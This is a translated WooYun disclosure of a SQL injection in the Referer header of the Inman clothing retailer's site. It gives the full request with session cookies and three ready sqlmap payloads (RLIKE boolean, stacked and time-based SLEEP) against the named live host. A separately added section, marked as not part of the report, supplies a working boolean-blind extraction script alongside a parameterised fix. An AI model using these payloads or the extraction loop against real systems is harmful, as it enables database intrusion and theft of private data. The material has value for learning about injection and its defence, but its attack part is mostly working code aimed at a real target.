
Vulnerability Summary

Defect ID: wooyun-2015-0140034

Title: SQL injection on the official site of Inman (of "Goddess's New Clothes" fame) leaks sensitive information

Vendor: Inman flagship store (茵曼旗舰店)

Author: 胡阿尤

Submitted: 2015-09-10 16:49

Fix deadline: 2015-10-25 16:50

Disclosed: 2015-10-25 16:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-10: Vendor contacted, awaiting vendor acknowledgement; details withheld from the public
2015-10-25: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

I've been watching "Goddess's New Clothes" lately. The goddesses are all so beautiful and the designers so talented; after watching I felt a lot more artistic. But then I remembered that WooYun's search now requires an account, and I don't have one yet. What to do?

Details:

GET /goods/get_share HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP:*
X-Requested-With: XMLHttpRequest
Referer: http://www.inman.com.cn:80/
Cookie: webshopsid=shl8q7ud05mng6nj7nmdstpt72; ETT[history]=%2C852180014%2C852180071%2C8521020201%2C8523030697%2C8520220104%2C8520130327%2C8421020175%2C8520940260%2C8520300114; Hm_lvt_0f2a19486025586858b316ef9861dc93=1440409967,1440410011,1440410035,1440410297; Hm_lpvt_0f2a19486025586858b316ef9861dc93=1440410297; HMACCOUNT=4970FC886A17DDD0; jiathis_uniqid=144040950555dae7a10de5a; jiathis_rdc=%7B%22http%3A//www.inman.com.cn/goods-852180046_c-164.html%22%3A1595530427%2C%22http%3A//www.inman.com.cn/goods-8520220741_c-288.html%22%3A%223%7C1440409671762%22%7D; webimagesid=i14hgar3a52ifv623ihjtn9qf4
Host: www.inman.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


HTTP headers are not strictly filtered: the value of the Referer header reaches a SQL query unsanitised, so it is injectable. sqlmap confirms it with three techniques:

Parameter: Referer (Referer)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.inman.com.cn:80/goods/get_share') RLIKE (SELECT (CASE WHEN (4868=4868) THEN 0x687474703a2f2f7777772e696e6d616e2e636f6d2e636e3a38302f676f6f64732f6765745f7368617265 ELSE 0x28 END)) AND ('HzxO'='HzxO
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://www.inman.com.cn:80/goods/get_share');(SELECT * FROM (SELECT(SLEEP(5)))JFvI)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.inman.com.cn:80/goods/get_share') AND (SELECT * FROM (SELECT(SLEEP(5)))kedy) AND ('pprz'='pprz
---
[05:04:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.29, PHP 5.3.29
back-end DBMS: MySQL 5
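The Referer injection described above, as an added example that is not part of the original report or of the Inman site's code: a hypothetical /goods/get_share handler that concatenates the Referer header into a parenthesised WHERE clause (the string context the `') ... AND ('x'='x` payloads on this page are built to break out of), the same lookup with a bound parameter, and a boolean-based blind extraction loop of the kind sqlmap runs once it has the oracle. SQLite stands in for MySQL, so a plain AND condition replaces the RLIKE and SLEEP payloads; the table names, columns and the `admin_token` row are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for the site's share lookup table.
# The table name, its columns and the settings row are all hypothetical.
SHARE_ROWS = [
    ("http://www.inman.com.cn:80/", "inman-home"),
    ("http://www.inman.com.cn/goods-852180046_c-164.html", "goods-852180046"),
]
SECRET = "s3cr3t_admin_token"  # constructed value the attacker wants to read


def make_db():
    """Build an in-memory SQLite database holding the constructed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE share_log (referer TEXT, share_code TEXT)")
    conn.executemany("INSERT INTO share_log VALUES (?, ?)", SHARE_ROWS)
    conn.execute("CREATE TABLE settings (name TEXT, value TEXT)")
    conn.execute("INSERT INTO settings VALUES ('admin_token', ?)", (SECRET,))
    return conn


def get_share_vulnerable(conn, referer):
    """Hypothetical get_share handler: the Referer header is concatenated into SQL.

    The parenthesised string context is what the page's payloads, which close
    with ') and reopen with AND ('x'='x, are shaped to break out of.
    """
    sql = "SELECT share_code FROM share_log WHERE (referer = '%s')" % referer
    return [row[0] for row in conn.execute(sql)]


def get_share_fixed(conn, referer):
    """Same lookup with a bound parameter: the header value can only ever be data."""
    sql = "SELECT share_code FROM share_log WHERE (referer = ?)"
    return [row[0] for row in conn.execute(sql, (referer,))]


def oracle(conn, condition, lookup=get_share_vulnerable):
    """Boolean-based blind oracle: a true condition keeps the known row in the
    result, a false one removes it. Plain AND is used instead of MySQL RLIKE so
    the same idea runs on SQLite."""
    base = "http://www.inman.com.cn:80/"
    payload = "%s') AND (%s) AND ('x'='x" % (base, condition)
    return lookup(conn, payload) == ["inman-home"]


def extract_blind(conn, subquery, max_len=64, lookup=get_share_vulnerable):
    """Read the result of `subquery` one character at a time through the oracle.

    Each character is located by binary search over its code point, about
    seven requests per character instead of one per candidate byte.
    """
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "LENGTH((%s)) >= %d" % (subquery, pos), lookup):
            break  # past the end of the value (or the oracle never fires)
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "UNICODE(SUBSTR((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if oracle(conn, probe, lookup):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    target = "SELECT value FROM settings WHERE name = 'admin_token'"
    print("vulnerable handler leaks:", extract_blind(db, target))
    print("fixed handler leaks:", repr(extract_blind(db, target, lookup=get_share_fixed)))
```

Against the parameterised handler the whole payload is compared as one literal string, no row matches, the oracle never fires and the loop returns an empty string. When reviewing an application of this kind, treat every header the code copies into a query the same way as a query-string parameter (Referer, User-Agent, X-Forwarded-For, and the Client-IP header visible in the request above), and note that sqlmap only tests User-Agent and Referer at `--level 3` or higher, so a scan run at the default level would have missed this finding.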


Proof of concept:

[Screenshots 1.jpg, 2.jpg, 3.jpg and 4.jpg; the images are not reproduced here]

Suggested fix:

Honestly, I don't understand this either; I'm here to learn from the experts.

Copyright notice: please credit 胡阿尤@乌云 when reposting


Vendor Response

Vendor response:

Vendor could not be reached, or vendor actively declined the report